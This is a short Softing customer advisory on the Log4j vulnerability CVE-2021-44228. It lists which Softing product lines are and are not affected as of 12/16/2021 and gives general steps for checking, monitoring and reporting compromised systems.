Critical vulnerability in Log4j (CVE-2021-44228)
The German Federal Office for Information Security (BSI) has set the log4j Authentication Library (CVE-2021-44228) to the warning level red (highest alert level). Our customers inquire whether various Softing products are affected.
The vulnerability is present in all applications embedding Log4j (ver. 2.0 to 2.14.1.) for audit logging feature. Mainly Apache stack but also applications like Elastic search, Redis, etc.
The vulnerability is based on forcing applications to log a specific string which forces vulnerable system to download and run malicious script from attacker-controlled domain. According to security researchers’ apps and services across the globe has already been actively scanned for vulnerable versions of Log4j by malicious actors.
Affected Products (as of 12/16/2021)
Confirmed affected products
- Customer specific products of Softing Automotive Electronics have been updated
Confirmed not affected products
- All generally available products of Softing Automotive Electronics
- All Softing Industrial Automation products
- All Softing IT Networks products
Not listed products are under investigation
- Focus on internet connected systems first
- Check whether a system is running log4j version 2.0 to 2.14.1 (2.15 was supposed to fix the problem, but introduced a new Denial of Service problem)
- For non-Softing products contact your system or software vendor to validate if log4j is in use and if any additional actions are required
For affected systems
- Check whether a system may be compromised
- If you have network monitoring tools in place implements suitable rules in order to detect potential attacks
- If you identify a system being compromised report it to the respective Security Officer or IT manager and consider disconnecting it from the network